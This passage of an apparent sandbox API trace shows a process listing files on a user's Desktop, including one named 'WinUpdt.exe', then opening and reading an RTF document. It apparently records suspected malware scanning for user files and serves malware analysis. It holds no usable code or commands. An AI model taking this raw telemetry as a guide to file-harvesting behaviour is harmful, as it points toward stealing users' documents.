ftLastWriteTime.dwHighDateTime=0x1d5e644, nFileSizeHigh=0x0, nFileSizeLow=0x10ad0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk2deXxOn2.mp3", cAlternateFileName="UK2DEX~1.MP3")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92501b30, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0xc75f45b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xc75f45b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V9T82XygGub", cAlternateFileName="V9T82X~1")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43d8180, ftCreationTime.dwHighDateTime=0x1d5fc35, ftLastAccessTime.dwLowDateTime=0xe43d8180, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xdee03700, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x298bd59, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinUpdt.exe", cAlternateFileName="")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bca7090, ftCreationTime.dwHighDateTime=0x1d5da45, ftLastAccessTime.dwLowDateTime=0xb9bdd820, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0xb9bdd820, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0x1646f, dwReserved0=0x0, dwReserved1=0x0, cFileName="XROLQ7T3Du67WCP mup.avi", cAlternateFileName="XROLQ7~1.AVI")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46cb5c60, ftCreationTime.dwHighDateTime=0x1d5da02, ftLastAccessTime.dwLowDateTime=0xa0fbea60, ftLastAccessTime.dwHighDateTime=0x1d5e1d7, ftLastWriteTime.dwLowDateTime=0xa0fbea60, ftLastWriteTime.dwHighDateTime=0x1d5e1d7, nFileSizeHigh=0x0, nFileSizeLow=0x1990, dwReserved0=0x0, dwReserved1=0x0, cFileName="YKJInkswhh-vUobOm.swf", cAlternateFileName="YKJINK~1.SWF")) returned 1 [0153.231] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca06de0, ftCreationTime.dwHighDateTime=0x1d5dccd, ftLastAccessTime.dwLowDateTime=0x7b6df330, ftLastAccessTime.dwHighDateTime=0x1d5e0ea, ftLastWriteTime.dwLowDateTime=0x7b6df330, ftLastWriteTime.dwHighDateTime=0x1d5e0ea, nFileSizeHigh=0x0, nFileSizeLow=0x168fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="z5gQHlQRF4wK.swf", cAlternateFileName="Z5GQHL~1.SWF")) returned 1 [0153.231] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58777950, ftCreationTime.dwHighDateTime=0x1d5e009, ftLastAccessTime.dwLowDateTime=0xebb5ff70, ftLastAccessTime.dwHighDateTime=0x1d5dafa, ftLastWriteTime.dwLowDateTime=0xebb5ff70, ftLastWriteTime.dwHighDateTime=0x1d5dafa, nFileSizeHigh=0x0, nFileSizeLow=0xcadc, dwReserved0=0x0, dwReserved1=0x0, cFileName="_DGVP9QaEiM.bmp", cAlternateFileName="_DGVP9~1.BMP")) returned 1 [0153.231] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.231] FindClose (in: hFindFile=0x94e8ef0 | out: hFindFile=0x94e8ef0) returned 1 [0153.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8b8) returned 1 [0153.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8c4) returned 1 [0153.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0153.231] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0153.231] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0153.231] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8ef0 [0153.231] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1eb9200, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0x30bb1690, ftLastAccessTime.dwHighDateTime=0x1d5dc41, ftLastWriteTime.dwLowDateTime=0x30bb1690, ftLastWriteTime.dwHighDateTime=0x1d5dc41, nFileSizeHigh=0x0, nFileSizeLow=0x1008b, dwReserved0=0x0, dwReserved1=0x0, cFileName="051N 5MK8k48.ods", cAlternateFileName="051N5M~1.ODS")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6843920, ftCreationTime.dwHighDateTime=0x1d5d8ad, ftLastAccessTime.dwLowDateTime=0xe2b7dd50, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0xe2b7dd50, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x7c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="23Yw-skJm.rtf", cAlternateFileName="23YW-S~1.RTF")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd2e790, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1c61dd50, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x1c61dd50, ftLastWriteTime.dwHighDateTime=0x1d5e5d8, nFileSizeHigh=0x0, nFileSizeLow=0x6ab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8dFMbgTmZgC_.avi", cAlternateFileName="8DFMBG~1.AVI")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7b74aa0, ftCreationTime.dwHighDateTime=0x1d5d89c, ftLastAccessTime.dwLowDateTime=0xbb62cb70, ftLastAccessTime.dwHighDateTime=0x1d5e66f, ftLastWriteTime.dwLowDateTime=0xbb62cb70, ftLastWriteTime.dwHighDateTime=0x1d5e66f, nFileSizeHigh=0x0, nFileSizeLow=0x46a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="a_RYwLdlR28QRoN6J_.wav", cAlternateFileName="A_RYWL~1.WAV")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8140f0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0xce584e40, ftLastAccessTime.dwHighDateTime=0x1d5e655, ftLastWriteTime.dwLowDateTime=0xce584e40, ftLastWriteTime.dwHighDateTime=0x1d5e655, nFileSizeHigh=0x0, nFileSizeLow=0x11f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="B_V9.png", cAlternateFileName="")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98159b50, ftCreationTime.dwHighDateTime=0x1d5de15, ftLastAccessTime.dwLowDateTime=0xae511b30, ftLastAccessTime.dwHighDateTime=0x1d5d936, ftLastWriteTime.dwLowDateTime=0xae511b30, ftLastWriteTime.dwHighDateTime=0x1d5d936, nFileSizeHigh=0x0, nFileSizeLow=0x1404, dwReserved0=0x0, dwReserved1=0x0, cFileName="cJ6NTjjSczDlq4GKMmq.mp3", cAlternateFileName="CJ6NTJ~1.MP3")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdec24830, ftCreationTime.dwHighDateTime=0x1d5e39e, ftLastAccessTime.dwLowDateTime=0x31c60c20, ftLastAccessTime.dwHighDateTime=0x1d5e20e, ftLastWriteTime.dwLowDateTime=0x31c60c20, ftLastWriteTime.dwHighDateTime=0x1d5e20e, nFileSizeHigh=0x0, nFileSizeLow=0xff22, dwReserved0=0x0, dwReserved1=0x0, cFileName="ct4LNtbIL6FO7I9J7A.gif", cAlternateFileName="CT4LNT~1.GIF")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bfabd00, ftCreationTime.dwHighDateTime=0x1d5e681, ftLastAccessTime.dwLowDateTime=0xe6e0bfb0, ftLastAccessTime.dwHighDateTime=0x1d5dbb5, ftLastWriteTime.dwLowDateTime=0xe6e0bfb0, ftLastWriteTime.dwHighDateTime=0x1d5dbb5, nFileSizeHigh=0x0, nFileSizeLow=0x5527, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dj_Db5l6vQeyuys.mp3", cAlternateFileName="DJ_DB5~1.MP3")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a5a0a20, ftCreationTime.dwHighDateTime=0x1d5e4c5, ftLastAccessTime.dwLowDateTime=0x7a064630, ftLastAccessTime.dwHighDateTime=0x1d5d881, ftLastWriteTime.dwLowDateTime=0x7a064630, ftLastWriteTime.dwHighDateTime=0x1d5d881, nFileSizeHigh=0x0, nFileSizeLow=0x6fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="EDix-MYQJ.m4a", cAlternateFileName="EDIX-M~1.M4A")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d9c8b0, ftCreationTime.dwHighDateTime=0x1d5db6b, ftLastAccessTime.dwLowDateTime=0x177a2e00, ftLastAccessTime.dwHighDateTime=0x1d5da11, ftLastWriteTime.dwLowDateTime=0x177a2e00, ftLastWriteTime.dwHighDateTime=0x1d5da11, nFileSizeHigh=0x0, nFileSizeLow=0x92f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="I1aBpgLf8euG-RNj.png", cAlternateFileName="I1ABPG~1.PNG")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb870e530, ftCreationTime.dwHighDateTime=0x1d5df28, ftLastAccessTime.dwLowDateTime=0xa2328ec0, ftLastAccessTime.dwHighDateTime=0x1d5e57e, ftLastWriteTime.dwLowDateTime=0xa2328ec0, ftLastWriteTime.dwHighDateTime=0x1d5e57e, nFileSizeHigh=0x0, nFileSizeLow=0x1037, dwReserved0=0x0, dwReserved1=0x0, cFileName="jiCMMpojd.jpg", cAlternateFileName="JICMMP~1.JPG")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fd88a0, ftCreationTime.dwHighDateTime=0x1d5e179, ftLastAccessTime.dwLowDateTime=0xa9ca3910, ftLastAccessTime.dwHighDateTime=0x1d5e814, ftLastWriteTime.dwLowDateTime=0xa9ca3910, ftLastWriteTime.dwHighDateTime=0x1d5e814, nFileSizeHigh=0x0, nFileSizeLow=0x13fd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jTH7ngKWMFidZN.rtf", cAlternateFileName="JTH7NG~1.RTF")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd68669e0, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0x64e41c70, ftLastAccessTime.dwHighDateTime=0x1d5e69e, ftLastWriteTime.dwLowDateTime=0x64e41c70, ftLastWriteTime.dwHighDateTime=0x1d5e69e, nFileSizeHigh=0x0, nFileSizeLow=0x12b1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="kCyf3o.ots", cAlternateFileName="")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x216f3360, ftCreationTime.dwHighDateTime=0x1d5df93, ftLastAccessTime.dwLowDateTime=0x32c36c50, ftLastAccessTime.dwHighDateTime=0x1d5e0b8, ftLastWriteTime.dwLowDateTime=0x32c36c50, ftLastWriteTime.dwHighDateTime=0x1d5e0b8, nFileSizeHigh=0x0, nFileSizeLow=0x10f7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="KXQA99dezB.bmp", cAlternateFileName="KXQA99~1.BMP")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b360910, ftCreationTime.dwHighDateTime=0x1d5e6ff, ftLastAccessTime.dwLowDateTime=0x4d7faa80, ftLastAccessTime.dwHighDateTime=0x1d5d885, ftLastWriteTime.dwLowDateTime=0x4d7faa80, ftLastWriteTime.dwHighDateTime=0x1d5d885, nFileSizeHigh=0x0, nFileSizeLow=0x1b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="ma8F_cd.png", cAlternateFileName="")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7f86720, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0xab7a0da0, ftLastAccessTime.dwHighDateTime=0x1d5e6f0, ftLastWriteTime.dwLowDateTime=0xab7a0da0, ftLastWriteTime.dwHighDateTime=0x1d5e6f0, nFileSizeHigh=0x0, nFileSizeLow=0x1349e, dwReserved0=0x0, dwReserved1=0x0, cFileName="P402ZR.gif", cAlternateFileName="")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4692060, ftCreationTime.dwHighDateTime=0x1d5df20, ftLastAccessTime.dwLowDateTime=0xe392fd10, ftLastAccessTime.dwHighDateTime=0x1d5dd9e, ftLastWriteTime.dwLowDateTime=0xe392fd10, ftLastWriteTime.dwHighDateTime=0x1d5dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2c9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="QDssgSAbPBdwSDz3KSM2.swf", cAlternateFileName="QDSSGS~1.SWF")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849947a0, ftCreationTime.dwHighDateTime=0x1d5e295, ftLastAccessTime.dwLowDateTime=0xd9c9c850, ftLastAccessTime.dwHighDateTime=0x1d5de1f, ftLastWriteTime.dwLowDateTime=0xd9c9c850, ftLastWriteTime.dwHighDateTime=0x1d5de1f, nFileSizeHigh=0x0, nFileSizeLow=0x1231d, dwReserved0=0x0, dwReserved1=0x0, cFileName="RWK-ERfyKVS1ubY43p5.png", cAlternateFileName="RWK-ER~1.PNG")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f8d8d0, ftCreationTime.dwHighDateTime=0x1d5e31f, ftLastAccessTime.dwLowDateTime=0x7010350, ftLastAccessTime.dwHighDateTime=0x1d5dd40, ftLastWriteTime.dwLowDateTime=0x7010350, ftLastWriteTime.dwHighDateTime=0x1d5dd40, nFileSizeHigh=0x0, nFileSizeLow=0x11041, dwReserved0=0x0, dwReserved1=0x0, cFileName="RYDs5gi.avi", cAlternateFileName="")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ac2fc0, ftCreationTime.dwHighDateTime=0x1d5de07, ftLastAccessTime.dwLowDateTime=0xcb0d6700, ftLastAccessTime.dwHighDateTime=0x1d5dca7, ftLastWriteTime.dwLowDateTime=0xcb0d6700, ftLastWriteTime.dwHighDateTime=0x1d5dca7, nFileSizeHigh=0x0, nFileSizeLow=0xa578, dwReserved0=0x0, dwReserved1=0x0, cFileName="TFQgVn4teOueBjEQc.flv", cAlternateFileName="TFQGVN~1.FLV")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c8bf50, ftCreationTime.dwHighDateTime=0x1d5e06e, ftLastAccessTime.dwLowDateTime=0x73732b0, ftLastAccessTime.dwHighDateTime=0x1d5d857, ftLastWriteTime.dwLowDateTime=0x73732b0, ftLastWriteTime.dwHighDateTime=0x1d5d857, nFileSizeHigh=0x0, nFileSizeLow=0xb12b, dwReserved0=0x0, dwReserved1=0x0, cFileName="tjCawpC7bDKOzKu.mkv", cAlternateFileName="TJCAWP~1.MKV")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8a5d10, ftCreationTime.dwHighDateTime=0x1d5dffa, ftLastAccessTime.dwLowDateTime=0xa536eda0, ftLastAccessTime.dwHighDateTime=0x1d5d863, ftLastWriteTime.dwLowDateTime=0xa536eda0, ftLastWriteTime.dwHighDateTime=0x1d5d863, nFileSizeHigh=0x0, nFileSizeLow=0x141af, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQBv9w3Q01q.m4a", cAlternateFileName="TQBV9W~1.M4A")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a5a4020, ftCreationTime.dwHighDateTime=0x1d5dd91, ftLastAccessTime.dwLowDateTime=0x576fd890, ftLastAccessTime.dwHighDateTime=0x1d5e644, ftLastWriteTime.dwLowDateTime=0x576fd890, ftLastWriteTime.dwHighDateTime=0x1d5e644, nFileSizeHigh=0x0, nFileSizeLow=0x10ad0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk2deXxOn2.mp3", cAlternateFileName="UK2DEX~1.MP3")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92501b30, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0xc75f45b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xc75f45b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V9T82XygGub", cAlternateFileName="V9T82X~1")) returned 1 [0153.236] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43d8180, ftCreationTime.dwHighDateTime=0x1d5fc35, ftLastAccessTime.dwLowDateTime=0xe43d8180, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xdee03700, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x298bd59, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinUpdt.exe", cAlternateFileName="")) returned 1 [0153.236] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bca7090, ftCreationTime.dwHighDateTime=0x1d5da45, ftLastAccessTime.dwLowDateTime=0xb9bdd820, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0xb9bdd820, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0x1646f, dwReserved0=0x0, dwReserved1=0x0, cFileName="XROLQ7T3Du67WCP mup.avi", cAlternateFileName="XROLQ7~1.AVI")) returned 1 [0153.236] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46cb5c60, ftCreationTime.dwHighDateTime=0x1d5da02, ftLastAccessTime.dwLowDateTime=0xa0fbea60, ftLastAccessTime.dwHighDateTime=0x1d5e1d7, ftLastWriteTime.dwLowDateTime=0xa0fbea60, ftLastWriteTime.dwHighDateTime=0x1d5e1d7, nFileSizeHigh=0x0, nFileSizeLow=0x1990, dwReserved0=0x0, dwReserved1=0x0, cFileName="YKJInkswhh-vUobOm.swf", cAlternateFileName="YKJINK~1.SWF")) returned 1 [0153.236] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca06de0, ftCreationTime.dwHighDateTime=0x1d5dccd, ftLastAccessTime.dwLowDateTime=0x7b6df330, ftLastAccessTime.dwHighDateTime=0x1d5e0ea, ftLastWriteTime.dwLowDateTime=0x7b6df330, ftLastWriteTime.dwHighDateTime=0x1d5e0ea, nFileSizeHigh=0x0, nFileSizeLow=0x168fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="z5gQHlQRF4wK.swf", cAlternateFileName="Z5GQHL~1.SWF")) returned 1 [0153.236] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58777950, ftCreationTime.dwHighDateTime=0x1d5e009, ftLastAccessTime.dwLowDateTime=0xebb5ff70, ftLastAccessTime.dwHighDateTime=0x1d5dafa, ftLastWriteTime.dwLowDateTime=0xebb5ff70, ftLastWriteTime.dwHighDateTime=0x1d5dafa, nFileSizeHigh=0x0, nFileSizeLow=0xcadc, dwReserved0=0x0, dwReserved1=0x0, cFileName="_DGVP9QaEiM.bmp", cAlternateFileName="_DGVP9~1.BMP")) returned 1 [0153.236] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58777950, ftCreationTime.dwHighDateTime=0x1d5e009, ftLastAccessTime.dwLowDateTime=0xebb5ff70, ftLastAccessTime.dwHighDateTime=0x1d5dafa, ftLastWriteTime.dwLowDateTime=0xebb5ff70, ftLastWriteTime.dwHighDateTime=0x1d5dafa, nFileSizeHigh=0x0, nFileSizeLow=0xcadc, dwReserved0=0x0, dwReserved1=0x0, cFileName="_DGVP9QaEiM.bmp", cAlternateFileName="_DGVP9~1.BMP")) returned 0 [0153.236] FindClose (in: hFindFile=0x94e8ef0 | out: hFindFile=0x94e8ef0) returned 1 [0153.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8b8) returned 1 [0153.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8c4) returned 1 [0153.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf", lpFilePart=0x0) returned 0x33 [0153.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\23yw-skjm.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.237] GetFileType (hFile=0x4d0) returned 0x1 [0153.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.237] GetFileType (hFile=0x4d0) returned 0x1 [0153.237] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x7c9e [0153.237] ReadFile (in: hFile=0x4d0, lpBuffer=0x23fc39c, nNumberOfBytesToRead=0x7c9e, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23fc39c*, lpNumberOfBytesRead=0x2ee894*=0x7c9e, lpOverlapped=0x0) returned 1 [0153.239] CloseHandle (hObject=0x4d0) returned 1 [0153.281] GetFullPathNameW (in: 